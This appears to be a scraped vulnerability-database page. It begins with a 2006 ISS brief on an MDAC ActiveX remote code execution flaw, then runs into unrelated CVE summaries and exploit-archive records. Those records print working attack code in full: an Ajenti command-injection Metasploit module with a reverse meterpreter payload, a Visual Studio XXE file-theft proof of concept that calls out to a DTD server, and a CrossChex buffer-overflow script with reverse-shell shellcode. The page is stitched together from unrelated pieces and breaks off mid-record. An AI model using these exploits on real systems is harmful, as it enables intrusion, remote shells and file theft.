ISS prtoection Brief: Microsoft MDAC Remote Code Execution
2006-04-12T00:00:00
ID SECURITYVULNS:DOC:12174 Type securityvulns Reporter Securityvulns Modified 2006-04-12T00:00:00
Description
-----BEGIN PGP SIGNED MESSAGE-----
Internet Security Systems Security Brief
April 11, 2006
Microsoft MDAC Remote Code Execution
Summary:
Microsoft has issued an advisory for a vulnerability in Microsoft Data Access
Components. Specifically, the RDS.Dataspace ActiveX control provided with MDAC
allows attackers to create malicious web pages and create objects with the
security context of the logged in user rather than the Internet Explorer DOM.
Business Impact:
Compromise of the operating system can lead to exposure of
confidential information, loss of productivity, and further network
compromise. Successful exploitation of this vulnerability could
be used to gain unauthorized access to one.s networks and machines.
Description:
It is possible to instantiate the RDS.Dataspace ActiveX control and not
have it associated with the Internet Explorer DOM. In doing so, it assumes
the security context of the currently logged on user and not the DOM. Under
this security context, functionality that is typically limited within
the DOM is now fully operational. Attackers may leverage this increased
privileged security context to execute commands on the target system.
Exploitation of this vulnerability requires the Internet Explorer
user to browse to a malicious page. Attackers may attempt to lure
users via phishing emails.
For the complete ISS X-Force Security Alert, please visit:
http://xforce.iss.net/xforce/alerts/id/219
About Internet Security Systems, Inc.
Internet Security Systems, Inc. (ISS) is the trusted security advisor to
thousands of the world.s leading businesses and governments, providing
preemptive protection for networks, desktops and servers. An established
leader in security since 1994, ISS. integrated security platform
automatically protects against both known and unknown threats, keeping
networks up and running and shielding customers from online attacks before
they impact business assets. ISS products and services are based
on the proactive security intelligence of its X-Force® research and
development team . the unequivocal world authority in vulnerability and
threat research. ISS. product line is also complemented by
comprehensive Managed Security Services. For more information, visit
the Internet Security Systems Web site at www.iss.net or call 800-776-2362.
Copyright (c) 2006 Internet Security Systems, Inc. All rights reserved
worldwide.
This document is not to be edited or altered in any way without the
express written consent of Internet Security Systems, Inc. If you wish
to reprint the whole or any part of this document, please email
xforce@iss.net for permission. You may provide links to this document
from your web site, and you may make copies of this document in
accordance with the fair use doctrine of the U.S. copyright laws.
Disclaimer: The information within this paper may change without notice.
Use of this information constitutes acceptance for use in an AS IS
condition. There are NO warranties, implied or otherwise, with regard to
this information or its use. Any use of this information is at the
user's risk. In no event shall the author/distributor (Internet Security
Systems X-Force) be held liable for any damages whatsoever arising out
of or in connection with the use or spread of this information.
X-Force PGP Key available on MIT's PGP key server and PGP.com's key
server, as well as at http://www.iss.net/security_center/sensitive.php
Please send suggestions, updates, and comments to: X-Force
{"id": "SECURITYVULNS:DOC:12174", "bulletinFamily": "software", "title": "ISS prtoection Brief: Microsoft MDAC Remote Code Execution", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\n\r\nInternet Security Systems Security Brief\r\nApril 11, 2006\r\n\r\nMicrosoft MDAC Remote Code Execution\r\n\r\nSummary: \r\nMicrosoft has issued an advisory for a vulnerability in Microsoft Data Access \r\nComponents. Specifically, the RDS.Dataspace ActiveX control provided with MDAC \r\nallows attackers to create malicious web pages and create objects with the \r\nsecurity context of the logged in user rather than the Internet Explorer DOM.\r\n\r\nBusiness Impact:\r\n\r\nCompromise of the operating system can lead to exposure of \r\nconfidential information, loss of productivity, and further network \r\ncompromise. Successful exploitation of this vulnerability could \r\nbe used to gain unauthorized access to one.s networks and machines.\r\n\r\nDescription:\r\n\r\nIt is possible to instantiate the RDS.Dataspace ActiveX control and not \r\nhave it associated with the Internet Explorer DOM. In doing so, it assumes \r\nthe security context of the currently logged on user and not the DOM. Under \r\nthis security context, functionality that is typically limited within \r\nthe DOM is now fully operational. Attackers may leverage this increased \r\nprivileged security context to execute commands on the target system. \r\n\r\nExploitation of this vulnerability requires the Internet Explorer \r\nuser to browse to a malicious page. Attackers may attempt to lure \r\nusers via phishing emails.\r\n\r\nFor the complete ISS X-Force Security Alert, please visit:\r\nhttp://xforce.iss.net/xforce/alerts/id/219\r\n_______________________________________________________________________________\r\n\r\nAbout Internet Security Systems, Inc.\r\nInternet Security Systems, Inc. (ISS) is the trusted security advisor to \r\nthousands of the world.s leading businesses and governments, providing \r\npreemptive protection for networks, desktops and servers. An established \r\nleader in security since 1994, ISS. integrated security platform \r\nautomatically protects against both known and unknown threats, keeping \r\nnetworks up and running and shielding customers from online attacks before \r\nthey impact business assets. ISS products and services are based \r\non the proactive security intelligence of its X-Force\u00ae research and \r\ndevelopment team . the unequivocal world authority in vulnerability and \r\nthreat research. ISS. product line is also complemented by \r\ncomprehensive Managed Security Services. For more information, visit \r\nthe Internet Security Systems Web site at www.iss.net or call 800-776-2362.\r\n\r\nCopyright (c) 2006 Internet Security Systems, Inc. All rights reserved\r\nworldwide.\r\n\r\nThis document is not to be edited or altered in any way without the\r\nexpress written consent of Internet Security Systems, Inc. If you wish\r\nto reprint the whole or any part of this document, please email\r\n\r\n\r\nxforce@iss.net for permission. You may provide links to this document\r\nfrom your web site, and you may make copies of this document in\r\naccordance with the fair use doctrine of the U.S. copyright laws. \r\n\r\nDisclaimer: The information within this paper may change without notice.\r\nUse of this information constitutes acceptance for use in an AS IS\r\ncondition. There are NO warranties, implied or otherwise, with regard to\r\nthis information or its use. Any use of this information is at the\r\nuser's risk. In no event shall the author/distributor (Internet Security\r\nSystems X-Force) be held liable for any damages whatsoever arising out\r\nof or in connection with the use or spread of this information.\r\n\r\nX-Force PGP Key available on MIT's PGP key server and PGP.com's key\r\nserver, as well as at http://www.iss.net/security_center/sensitive.php\r\nPlease send suggestions, updates, and comments to: X-Force\r\n\r\n\r\nxforce@iss.net of Internet Security Systems, Inc.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: 2.6.2\r\n\r\niQCVAwUBRDwCCzRfJiV99eG9AQEHxQP+OoGPrgFI+1Sp8svYNW4tdj76pAHc8KoE\r\npfn/OnEAbZyrtzIHrCc3VswbTzk4NxJBlBnEl2zogtmxU5B7uo0h89AW90782/ZY\r\nfCto2Tdy8EgNJ8qdYTybpb6peOssFSLQ7OSHlp6QVByWjH5NViVcdjp3RavNgGau\r\nKEICRvMAi50=\r\n=61AW\r\n-----END PGP SIGNATURE-----", "published": "2006-04-12T00:00:00", "modified": "2006-04-12T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:12174", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:17", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "9293acd795ed54cf90304e81217b129d"}, {"key": "href", "hash": "04f8966cd430d0b7a5e5f2d7c8e97787"}, {"key": "modified", "hash": "773bf503fec5a5995126f14f258c0c40"}, {"key": "published", "hash": "773bf503fec5a5995126f14f258c0c40"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a49ebb2e1a771348dfa0039e0d589df6"}, {"key": "title", "hash": "d574fedc99ec97840580460abb3d59f1"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "351706245654e7935a1120bf73c8e7a5c1d1a5c1e207b2db6348b62fb1646868", "viewCount": 6, "enchantments": {"score": {"value": 3.0, "vector": "NONE", "modified": "2018-08-31T11:10:17"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310852529", "OPENVAS:1361412562310852527"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1485-1", "OPENSUSE-SU-2019:1481-1", "OPENSUSE-SU-2019:1479-1"]}, {"type": "ubuntu", "idList": ["USN-3996-1"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994293"]}, {"type": "zdt", "idList": ["1337DAY-ID-32799", "1337DAY-ID-32772", "1337DAY-ID-32775", "1337DAY-ID-32771", "1337DAY-ID-32767", "1337DAY-ID-32754", "1337DAY-ID-32753", "1337DAY-ID-32757", "1337DAY-ID-32725", "1337DAY-ID-32724"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:152997"]}, {"type": "kitploit", "idList": ["KITPLOIT:3928947731225997712"]}], "modified": "2018-08-31T11:10:17"}, "vulnersScore": 3.0}, "objectVersion": "1.3", "affectedSoftware": []}
{"cve": [{"lastseen": "2019-12-07T11:41:12", "bulletinFamily": "NVD", "description": "An SQL Injection vulnerability exists in MiniDLNA prior to 1.1.0", "modified": "2019-12-05T04:01:00", "id": "CVE-2013-2745", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2745", "published": "2019-12-04T22:15:00", "title": "CVE-2013-2745", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-03T17:07:13", "bulletinFamily": "NVD", "description": "FreeBSD: Input Validation Flaw allows local users to gain elevated privileges", "modified": "2019-12-02T18:38:00", "id": "CVE-2012-4576", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4576", "published": "2019-12-02T18:15:00", "title": "CVE-2012-4576", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-03T17:04:16", "bulletinFamily": "NVD", "description": "Path traversal vulnerability in Docker before 1.3.3 allows remote attackers to write to arbitrary files and bypass a container protection mechanism via a full pathname in a symlink in an (1) image or (2) build in a Dockerfile.", "modified": "2019-12-02T18:38:00", "id": "CVE-2014-9356", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9356", "published": "2019-12-02T18:15:00", "title": "CVE-2014-9356", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-03T17:08:34", "bulletinFamily": "NVD", "description": "The mpi_powm function in Libgcrypt before 1.6.3 and GnuPG before 1.4.19 allows attackers to obtain sensitive information by leveraging timing differences when accessing a pre-computed table during modular exponentiation, related to a \"Last-Level Cache Side-Channel Attack.\"", "modified": "2019-12-02T13:37:00", "id": "CVE-2015-0837", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0837", "published": "2019-11-29T22:15:00", "title": "CVE-2015-0837", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-07T11:40:06", "bulletinFamily": "NVD", "description": "Libgcrypt before 1.6.3 and GnuPG before 1.4.19 does not implement ciphertext blinding for Elgamal decryption, which allows physically proximate attackers to obtain the server's private key by determining factors using crafted ciphertext and the fluctuations in the electromagnetic field during multiplication.", "modified": "2019-12-05T18:06:00", "id": "CVE-2014-3591", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3591", "published": "2019-11-29T22:15:00", "title": "CVE-2014-3591", "type": "cve", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-12-03T17:08:36", "bulletinFamily": "NVD", "description": "cabextract before 1.6 does not properly check for leading slashes when extracting files, which allows remote attackers to conduct absolute directory traversal attacks via a malformed UTF-8 character that is changed to a UTF-8 encoded slash.", "modified": "2019-12-02T13:37:00", "id": "CVE-2015-2060", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2060", "published": "2019-11-29T21:15:00", "title": "CVE-2015-2060", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-03T17:08:37", "bulletinFamily": "NVD", "description": "The PGP signature parsing in Module::Signature before 0.74 allows remote attackers to cause the unsigned portion of a SIGNATURE file to be treated as the signed portion via unspecified vectors.", "modified": "2019-12-02T13:37:00", "id": "CVE-2015-3406", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3406", "published": "2019-11-29T21:15:00", "title": "CVE-2015-3406", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-03T17:08:35", "bulletinFamily": "NVD", "description": "verify_certificate_identity in the OpenSSL extension in Ruby before 2.0.0 patchlevel 645, 2.1.x before 2.1.6, and 2.2.x before 2.2.2 does not properly validate hostnames, which allows remote attackers to spoof servers via vectors related to (1) multiple wildcards, (1) wildcards in IDNA names, (3) case sensitivity, and (4) non-ASCII characters.", "modified": "2019-12-02T13:37:00", "published": "2019-11-29T21:15:00", "id": "CVE-2015-1855", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1855", "title": "CVE-2015-1855", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-07T12:39:29", "bulletinFamily": "NVD", "description": "The addto parameter to fup in Frams' Fast File EXchange (F*EX, aka fex) before fex-2014053 allows remote attackers to conduct cross-site scripting (XSS) attacks", "modified": "2019-12-06T17:24:00", "id": "CVE-2014-3875", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3875", "published": "2019-11-27T19:15:00", "title": "CVE-2014-3875", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-11-26T12:31:59", "bulletinFamily": "NVD", "description": "A Directory Traversal vulnerability exists in the GNU patch before 2.7.4. A remote attacker can write to arbitrary files via a symlink attack in a patch file. NOTE: this issue exists because of an incomplete fix for CVE-2015-1196.", "modified": "2019-11-25T17:35:00", "id": "CVE-2015-1396", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1396", "published": "2019-11-25T16:15:00", "title": "CVE-2015-1396", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2019-12-04T16:04:29", "bulletinFamily": "exploit", "description": "This Metasploit module exploits a command injection in Ajenti version 2.1.31. By injecting a command into the username POST parameter to api/core/auth, a shell can be spawned.", "modified": "2019-12-03T00:00:00", "published": "2019-12-03T00:00:00", "id": "1337DAY-ID-33620", "href": "https://0day.today/exploit/description/33620", "title": "Ajenti 2.1.31 Command Injection Exploit", "type": "zdt", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Ajenti auth username Command Injection',\r\n 'Description' => %q{\r\n This module exploits a command injection in Ajenti == 2.1.31.\r\n By injecting a command into the username POST parameter to api/core/auth, a shell can be spawned.\r\n },\r\n 'Author' => [\r\n 'Jeremy Brown', # Vulnerability discovery\r\n 'Onur ER <[email\u00a0protected]>' # Metasploit module\r\n ],\r\n 'References' => [\r\n ['EDB', '47497']\r\n ],\r\n 'DisclosureDate' => '2019-10-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'python',\r\n 'Arch' => ARCH_PYTHON,\r\n 'Privileged' => false,\r\n 'Targets' => [\r\n ['Ajenti == 2.1.31', {}]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'RPORT' => 8000,\r\n 'SSL' => true,\r\n 'payload' => 'python/meterpreter/reverse_tcp'\r\n },\r\n 'DefaultTarget' => 0\r\n ))\r\n register_options([\r\n OptString.new('TARGETURI', [true, 'Base path', '/'])\r\n ])\r\n end\r\n\r\n def check\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => '/view/login/normal'\r\n })\r\n\r\n unless res\r\n vprint_error 'Connection failed'\r\n return CheckCode::Unknown\r\n end\r\n\r\n unless res.body =~ /ajenti/i\r\n return CheckCode::Safe\r\n end\r\n\r\n version = res.body.scan(/'ajentiVersion', '([\\d\\.]+)'/).flatten.first\r\n\r\n if version\r\n vprint_status \"Ajenti version #{version}\"\r\n end\r\n\r\n if version == '2.1.31'\r\n return CheckCode::Appears\r\n end\r\n\r\n CheckCode::Detected\r\n end\r\n\r\n def exploit\r\n print_status('Exploiting...')\r\n json_body = { 'username' => \"`python -c \\\"#{payload.encoded}\\\"`\",\r\n 'password' => rand_text_alpha_lower(7),\r\n 'mode' => 'normal'\r\n }\r\n send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri, 'api', 'core', 'auth'),\r\n 'ctype' => 'application/json',\r\n 'data' => JSON.generate(json_body)\r\n })\r\n end\r\nend\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33620"}, {"lastseen": "2019-12-04T14:10:38", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2019-12-02T00:00:00", "published": "2019-12-02T00:00:00", "id": "1337DAY-ID-33612", "href": "https://0day.today/exploit/description/33612", "title": "Visual Studio 2008 - XML External Entity Injection Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: Visual Studio 2008 - XML External Entity Injection\r\n# Discovery by: hyp3rlinx\r\n# Date: 2019-12-02\r\n# Vendor Homepage: www.microsoft.com\r\n# Software Link: Visual Studio 2008 Express IDE \r\n# Tested Version: 2008\r\n# CVE: N/A\r\n\r\n[+] Credits: John Page (aka hyp3rlinx)\t\t\r\n[+] Website: hyp3rlinx.altervista.org\r\n[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-VISUAL-STUDIO-EXPRESS-2008-IDE-XML-EXTERNAL-ENTITY-0Day.txt\r\n[+] ISR: ApparitionSec \r\n\r\n\r\n[Vendor]\r\nwww.microsoft.com\r\n\r\n\r\n[Product]\r\nVisual Studio 2008 Express IDE \r\nvcsetup.exe\r\nFile hash: 62f764849e8fcdf8bfbc342685641304\r\nDownload: http://go.microsoft.com/?linkid=7729279\r\n\r\n\r\n[Vulnerability Type]\r\nXML External Entity Injection 0Day\r\n\r\n\r\n[CVE Reference]\r\nN/A\r\n\r\n\r\n[Security Issue]\r\nVisual Studio 2008 IDE suffers from XML External Entity injection. Attackers can leverage many file types, some being MASM related files like .asm or .lst.\r\nBy opening any one of the following file types listed below, it can allow remote attackers to steal files from the victims computer, sending them to the\r\nremote attackers server. \r\n\r\nDouble click any of the following extensions and it will trigger the XXE vulnerability. Note, upon installation of the IDE the following file types get \r\nassociated with Visual Studio 2008 and are ALL vulnerable and will trigger the XXE exploit.\r\n\r\n[Vuln XXE file types]\r\n.snippet\r\n.i\r\n.s\r\n.asm\r\n.disco\r\n.lst\r\n.inc\r\n.srf\r\n.wsdl\r\n.rgs\r\n.xml\r\n\r\nThis IDE is pretty old, I know, but its still available for download as of this writing, therefore I release the advisory.\r\n\r\n\r\n[References]\r\nhttps://devblogs.microsoft.com/visualstudio/end-of-support-for-visual-studio-2008-in-one-year/\r\n\r\n\r\n[Exploit/POC]\r\n\"Evil.snippet\" or any of the extensions mentioned above.\r\n\r\n<?xml version=\"1.0\"?>\r\n<!DOCTYPE knobgobslob [ \r\n<!ENTITY % file SYSTEM \"C:\\Windows\\system.ini\">\r\n<!ENTITY % dtd SYSTEM \"http://127.0.0.1:8000/payload.dtd\">\r\n%dtd;]>\r\n<pwn>&send;</pwn>\r\n\r\n\r\n\"payload.dtd\"\r\n\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<!ENTITY % all \"<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>\">\r\n%all;\r\n\r\n\r\npython -m SimpleHTTPServer\r\npython -m http.server (Python3)\r\n\r\n\r\n[POC Video URL]\r\nhttps://www.youtube.com/watch?v=QOZlwzsbPrk\r\n\r\n\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33612"}, {"lastseen": "2019-12-04T02:04:32", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2019-12-02T00:00:00", "published": "2019-12-02T00:00:00", "id": "1337DAY-ID-33614", "href": "https://0day.today/exploit/description/33614", "title": "Anviz CrossChex 4.3.12 - Local Buffer Overflow Exploit", "type": "zdt", "sourceData": "# Exploit Title: Anviz CrossChex 4.3.12 - Local Buffer Overflow\r\n# Exploit Author: Luis Catarino & Pedro Rodrigues\r\n# Vendor Homepage: https://www.anviz.com/\r\n# Software Link: https://www.anviz.com/download.html\r\n# Version: Crosschex Standard x86 <= V4.3.12\r\n# Tested on: 4.3.8.0, 4.3.12\r\n# CVE : N/A\r\n# More info: https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html\r\n\r\nimport socket\r\nimport time\r\nimport sys\r\nimport binascii\r\n\r\n# Scapy for the broadcast packet with custom sport\r\nfrom scapy.all import Raw,IP,Dot1Q,UDP,Ether\r\nimport scapy.all\r\n\r\n# shellcode working calc.exe\r\ncalculator_payload = b\"\\xfc\\xe8\\x82\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xc0\\x64\\x8b\"\r\ncalculator_payload += b\"\\x50\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\"\r\ncalculator_payload += b\"\\x4a\\x26\\x31\\xff\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\"\r\ncalculator_payload += b\"\\x0d\\x01\\xc7\\xe2\\xf2\\x52\\x57\\x8b\\x52\\x10\\x8b\\x4a\\x3c\"\r\ncalculator_payload += b\"\\x8b\\x4c\\x11\\x78\\xe3\\x48\\x01\\xd1\\x51\\x8b\\x59\\x20\\x01\"\r\ncalculator_payload += b\"\\xd3\\x8b\\x49\\x18\\xe3\\x3a\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\"\r\ncalculator_payload += b\"\\xff\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf6\\x03\\x7d\"\r\ncalculator_payload += b\"\\xf8\\x3b\\x7d\\x24\\x75\\xe4\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\"\r\ncalculator_payload += b\"\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\\x04\\x8b\\x01\\xd0\"\r\ncalculator_payload += b\"\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x5f\"\r\ncalculator_payload += b\"\\x5f\\x5a\\x8b\\x12\\xeb\\x8d\\x5d\\x6a\\x01\\x8d\\x85\\xb2\\x00\"\r\ncalculator_payload += b\"\\x00\\x00\\x50\\x68\\x31\\x8b\\x6f\\x87\\xff\\xd5\\xbb\\xf0\\xb5\"\r\ncalculator_payload += b\"\\xa2\\x56\\x68\\xa6\\x95\\xbd\\x9d\\xff\\xd5\\x3c\\x06\\x7c\\x0a\"\r\ncalculator_payload += b\"\\x80\\xfb\\xe0\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x53\"\r\ncalculator_payload += b\"\\xff\\xd5\\x63\\x61\\x6c\\x63\\x2e\\x65\\x78\\x65\\x00\"\r\n\r\n# shellcode windows x86 reverse_shell\r\nshell_payload_1 = b\"\\xfc\\xe8\\x82\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xc0\\x64\\x8b\"\r\nshell_payload_1 += b\"\\x50\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\"\r\nshell_payload_1 += b\"\\x4a\\x26\\x31\\xff\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\"\r\nshell_payload_1 += b\"\\x0d\\x01\\xc7\\xe2\\xf2\\x52\\x57\\x8b\\x52\\x10\\x8b\\x4a\\x3c\"\r\nshell_payload_1 += b\"\\x8b\\x4c\\x11\\x78\\xe3\\x48\\x01\\xd1\\x51\\x8b\\x59\\x20\\x01\"\r\nshell_payload_1 += b\"\\xd3\\x8b\\x49\\x18\\xe3\\x3a\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\"\r\nshell_payload_1 += b\"\\xff\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf6\\x03\\x7d\"\r\nshell_payload_1 += b\"\\xf8\\x3b\\x7d\\x24\\x75\\xe4\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\"\r\nshell_payload_1 += b\"\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\\x04\\x8b\\x01\\xd0\"\r\nshell_payload_1 += b\"\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x5f\"\r\nshell_payload_1 += b\"\\x5f\\x5a\\x8b\\x12\\xeb\\x8d\\x5d\\x68\\x33\\x32\\x00\\x00\\x68\"\r\nshell_payload_1 += b\"\\x77\\x73\\x32\\x5f\\x54\\x68\\x4c\\x77\\x26\\x07\\xff\\xd5\\xb8\"\r\nshell_payload_1 += b\"\\x90\\x01\\x00\\x00\\x29\\xc4\\x54\\x50\\x68\\x29\\x80\\x6b\\x00\"\r\nshell_payload_1 += b\"\\xff\\xd5\\x50\\x50\\x50\\x50\\x40\\x50\\x40\\x50\\x68\\xea\\x0f\"\r\nshell_payload_1 += b\"\\xdf\\xe0\\xff\\xd5\\x97\\x6a\\x05\\x68\"\r\n\r\n# shellcode windows x86 reverse_shell (part_2)\r\nshell_payload_2 = b\"\\x68\\x02\\x00\\x01\\xbd\\x89\\xe6\\x6a\\x10\\x56\\x57\\x68\\x99\\xa5\"\r\nshell_payload_2 += b\"\\x74\\x61\\xff\\xd5\\x85\\xc0\\x74\\x0c\\xff\\x4e\\x08\\x75\\xec\"\r\nshell_payload_2 += b\"\\x68\\xf0\\xb5\\xa2\\x56\\xff\\xd5\\x68\\x63\\x6d\\x64\\x00\\x89\"\r\nshell_payload_2 += b\"\\xe3\\x57\\x57\\x57\\x31\\xf6\\x6a\\x12\\x59\\x56\\xe2\\xfd\\x66\"\r\nshell_payload_2 += b\"\\xc7\\x44\\x24\\x3c\\x01\\x01\\x8d\\x44\\x24\\x10\\xc6\\x00\\x44\"\r\nshell_payload_2 += b\"\\x54\\x50\\x56\\x56\\x56\\x46\\x56\\x4e\\x56\\x56\\x53\\x56\\x68\"\r\nshell_payload_2 += b\"\\x79\\xcc\\x3f\\x86\\xff\\xd5\\x89\\xe0\\x4e\\x56\\x46\\xff\\x30\"\r\nshell_payload_2 += b\"\\x68\\x08\\x87\\x1d\\x60\\xff\\xd5\\xbb\\xf0\\xb5\\xa2\\x56\\x68\"\r\nshell_payload_2 += b\"\\xa6\\x95\\xbd\\x9d\\xff\\xd5\\x3c\\x06\\x7c\\x0a\\x80\\xfb\\xe0\"\r\nshell_payload_2 += b\"\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x53\\xff\\xd5\"\r\n\r\ndef ipToShellcode(ip):\r\n a = ip.split('.')\r\n b = hex(int(a[0])) + hex(int(a[1])) + hex(int(a[2])) + hex(int(a[3]))\r\n b = b.replace(\"0x\",\"\")\r\n return binascii.unhexlify(b)\r\n\r\n# sport has to be 5060\r\ndef sendFuzzingUDPBroadcast(ip=\"255.255.255.255\", sport=5050, dport=5060):\r\n request = b\"A\"*77 # Original payload substitute\r\n request += b\"B\"*184\r\n request += b\"\\x07\\x18\\x42\\x00\" # EIP - 00421807 crosscheck_standard.exe\r\n request += b\"A\"*4\r\n # 269 bytes\r\n\r\n if len(sys.argv) > 2:\r\n request = request + shell_payload_1 + ipToShellcode(sys.argv[2]) + shell_payload_2\r\n else:\r\n request = request + calculator_payload\r\n\r\n scapy.all.sendp( Ether(src='00:00:00:00:00:00', dst=\"ff:ff:ff:ff:ff:ff\")/IP(src=ip,dst='255.255.255.255')/UDP(sport=sport,dport=dport)/Raw(load=request), iface=sys.argv[1] )\r\n\r\ndef setFuzzUDPServer(ip='', port=5050, timeout=150):\r\n try :\r\n \ts = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n except:\r\n \tprint('[!] Failed to create server socket')\r\n\r\n try:\r\n \ts.bind(('', port))\r\n except:\r\n \tprint('[*] Server socket bind failed')\r\n \tsys.exit()\r\n\r\n print('[*] Waiting for crosschex')\r\n s.settimeout(timeout)\r\n timeout = time.time() + timeout\r\n responses = []\r\n\r\n while True:\r\n if time.time() > timeout:\r\n break\r\n try:\r\n response = s.recvfrom(1024)\r\n print(response)\r\n responses.append(response)\r\n sendFuzzingUDPBroadcast(ip=ip)\r\n response = s.recvfrom(1024) \r\n except socket.timeout:\r\n print(\"[!] Error with UDP server\")\r\n\r\n s.close()\r\n return responses\r\n\r\nnargs = len(sys.argv)\r\n\r\nif nargs < 2:\r\n print(\"[*] Usage: python3 %s <network_interface> [<ip>]\\n\\tif you don't pass the ip of the LHOST it will drop a calculator, if you set the ip it will send a reverse shell to port 445\")\r\n sys.exit(0)\r\n\r\nsetFuzzUDPServer()\n\n# 0day.today [2019-12-03] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33614"}, {"lastseen": "2019-12-04T01:58:54", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2019-11-27T00:00:00", "published": "2019-11-27T00:00:00", "id": "1337DAY-ID-33593", "href": "https://0day.today/exploit/description/33593", "title": "InduSoft Web Studio 8.1 SP1 - (Atributos) Denial of Service Exploit", "type": "zdt", "sourceData": "# Exploit Title: InduSoft Web Studio 8.1 SP1 - \"Atributos\" Denial of Service (PoC)\r\n# Discovery by: chuyreds\r\n# Vendor Homepage: http://www.indusoft.com/\r\n# Software Link : http://www.indusoft.com/Products-Downloads\r\n# Tested Version: 8.1 SP1\r\n# Vulnerability Type: Denial of Service (DoS) Local\r\n# Tested on OS: Windows 10 Pro x64 es\r\n\r\n# Exploit Title: InduSoft Web Studio 8.1 SP1 - 